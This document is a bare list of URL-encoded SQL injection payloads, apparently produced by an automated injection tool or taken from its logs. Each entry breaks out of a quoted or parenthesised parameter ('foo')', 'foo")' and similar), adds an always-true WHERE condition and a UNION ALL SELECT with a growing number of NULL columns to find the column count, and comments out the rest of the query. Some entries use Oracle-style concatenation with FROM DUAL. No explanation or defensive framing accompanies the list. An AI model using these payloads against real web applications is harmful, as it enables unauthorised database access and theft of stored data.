foo%27%29%20WHERE%206864%3D6864%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206020%3D6020%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203563%3D3563%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%207017%3D7017%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204388%3D4388%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%201449%3D1449%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203078%3D3078%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204499%3D4499%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%203245%3D3245%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204890%3D4890%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%203116%3D3116%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209256%3D9256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%206278%3D6278%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%203456%3D3456%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%205437%3D5437%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%209186%3D9186%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%201161%3D1161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%204427%3D4427%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%201403%3D1403%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208424%3D8424%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201715%3D1715%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%207464%3D7464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201855%3D1855%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%205507%3D5507%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208993%3D8993%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%205939%3D5939%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%209089%3D9089%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%207600%3D7600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%209442%3D9442%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%205304%3D5304%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204521%3D4521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206293%3D6293%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206198%3D6198%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208678%3D8678%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%201037%3D1037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208212%3D8212%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208093%3D8093%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%209855%3D9855%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208617%3D8617%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208753%3D8753%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207403%3D7403%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201594%3D1594%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207804%3D7804%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%204062%3D4062%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208126%3D8126%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208037%3D8037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%209178%3D9178%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203093%3D3093%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205004%3D5004%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%206122%3D6122%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%208907%3D8907%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%208569%3D8569%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201908%3D1908%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%206137%3D6137%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%208543%3D8543%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%207814%3D7814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201680%3D1680%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202236%3D2236%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202097%3D2097%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27fQmf%27%20FROM%20DUAL%20WHERE%202838%3D2838%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27reXX%27%20FROM%20DUAL%20WHERE%204710%3D4710%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27BsyZ%27%20FROM%20DUAL%20WHERE%203363%3D3363%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27PbMO%27%20FROM%20DUAL%20WHERE%206042%3D6042%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27PyXI%27%20FROM%20DUAL%20WHERE%209218%3D9218%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27sTiN%27%20FROM%20DUAL%20WHERE%204033%3D4033%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27uoZN%27%20FROM%20DUAL%20WHERE%205577%3D5577%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27KilN%27%20FROM%20DUAL%20WHERE%202490%3D2490%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27UmQL%27%20FROM%20DUAL%20WHERE%204293%3D4293%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27NEhy%27%20FROM%20DUAL%20WHERE%201932%3D1932%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27wjJF%27%20WHERE%205718%3D5718%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27nhZU%27%20WHERE%202503%3D2503%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27uWnL%27%20WHERE%203146%3D3146%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27muSE%27%20WHERE%206130%3D6130%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27iCDL%27%20WHERE%208480%3D8480%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27dguk%27%20WHERE%207848%3D7848%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27UIoT%27%20WHERE%202843%3D2843%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 